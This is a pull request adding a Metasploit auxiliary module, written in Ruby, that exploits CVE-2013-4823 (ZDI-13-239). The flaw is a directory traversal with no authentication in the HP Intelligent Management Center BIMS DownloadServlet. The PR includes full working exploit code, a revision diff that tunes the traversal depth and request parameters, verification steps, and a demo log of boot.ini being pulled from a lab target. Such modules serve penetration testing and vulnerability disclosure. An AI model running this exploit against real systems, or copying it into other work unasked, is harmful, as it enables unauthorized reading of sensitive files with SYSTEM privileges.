### PR TITLE
Add module for ZDI-13-239

### DIFF
--- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP Intelligent Management BIMS DownloadServlet Directory Traversal',
+      'Description'    => %q{
+          This module exploits a lack of authentication and a directory traversal in HP
+        Intelligent Management, specifically in the DownloadServlet from the BIMS component,
+        in order to retrieve arbitrary files with SYSTEM privileges. This module has been
+        tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-4823' ],
+          [ 'OSVDB', '98248' ],
+          [ 'BID', '62897' ],
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-239/' ]
+        ]
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+        OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+        # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+        OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+      ], self.class)
+  end
+
+  def is_imc?
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path.to_s, "", ""),
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+      return true
+    else
+      return false
+    end
+  end
+
+  def my_basename(filename)
+    return ::File.basename(filename.gsub(/\\/, "/"))
+  end
+
+  def run_host(ip)
+
+    if not is_imc?
+      vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+      return
+    end
+
+    travs = ""
+    travs << "../" * datastore['DEPTH']
+    travs << datastore['FILEPATH']
+
+    vprint_status("#{rhost}:#{rport} - Sending request...")
+    res = send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, "bimsDownload"),
+      'method'       => 'GET',
+      'vars_get'     =>
+        {
+          'fileName' => travs
+        }
+    })
+
+    if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+      contents = res.body
+      fname = my_basename(datastore['FILEPATH'])
+      path = store_loot(
+        'hp.imc.faultdownloadservlet',
+        'application/octet-stream',
+        ip,
+        contents,
+        fname
+      )
+      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+    else
+      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      return
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb
@@ -18,7 +18,8 @@ class Metasploit3 < Msf::Auxiliary
           This module exploits a lack of authentication and a directory traversal in HP
         Intelligent Management, specifically in the DownloadServlet from the BIMS component,
         in order to retrieve arbitrary files with SYSTEM privileges. This module has been
-        tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+        tested successfully on HP Intelligent Management Center 5.1 E0202 with BIMS 5.1 E0201
+        over Windows 2003 SP2.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -40,15 +41,15 @@ class Metasploit3 < Msf::Auxiliary
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
         OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
-        # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
-        OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+        # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\
+        OptInt.new('DEPTH', [true, 'Traversal depth', 6])
       ], self.class)
   end
 
   def is_imc?
     res = send_request_cgi({
-      'uri'    => normalize_uri(target_uri.path.to_s, "", ""),
-      'method' => 'GET'
+      'uri'      => normalize_uri(target_uri.path.to_s, "login.jsf"),
+      'method'   => 'GET'
     })
 
     if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
@@ -79,7 +80,8 @@ class Metasploit3 < Msf::Auxiliary
       'method'       => 'GET',
       'vars_get'     =>
         {
-          'fileName' => travs
+          'fileName' => travs,
+          'path'     => "/"
         }
     })
 
@@ -87,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
       contents = res.body
       fname = my_basename(datastore['FILEPATH'])
       path = store_loot(
-        'hp.imc.faultdownloadservlet',
+        'hp.imc.bimsdownloadservlet',
         'application/octet-stream',
         ip,
         contents,


### PR DESCRIPTION
Tested successfully on HP Intelligent Management Center 5.1 E0202 with BIMS 5.1 E0201 over Windows 2003 SP2

Verification:
- [ ] download HP IMC 5.1 E0202 trial from http://h17007.www1.hp.com/us/en/networking/products/network-management/IMC_ES_Platform/index.aspx#.UmIcvJRASaI
- [ ] download the BIMS 5.1 E0201 component from http://h17007.www1.hp.com/us/en/networking/products/network-management/IMC_BIM_Software/index.aspx#.UmIc8pRASaI
- [ ] Install both IMC nad the BIMS component
- [ ] Ensure the IMC service is running on the port 8080
- [ ] Run the msfconsole, use the module, run, you should download by default the boot.ini of the target system (default install) (see demo)
- Demo

```
msf auxiliary(hp_imc_bims_downloadservlet_traversal) > run

[*] 192.168.172.133:8080 - Sending request...
[+] 192.168.172.133:8080 - File saved in: /Users/juan/.msf4/loot/20131020183635_default_192.168.172.133_hp.imc.bimsdownl_886950.ini
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(hp_imc_bims_downloadservlet_traversal) > cat /Users/juan/.msf4/loot/20131020183635_default_192.168.172.133_hp.imc.bimsdownl_886950.ini
[*] exec: cat /Users/juan/.msf4/loot/20131020183635_default_192.168.172.133_hp.imc.bimsdownl_886950.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect
```
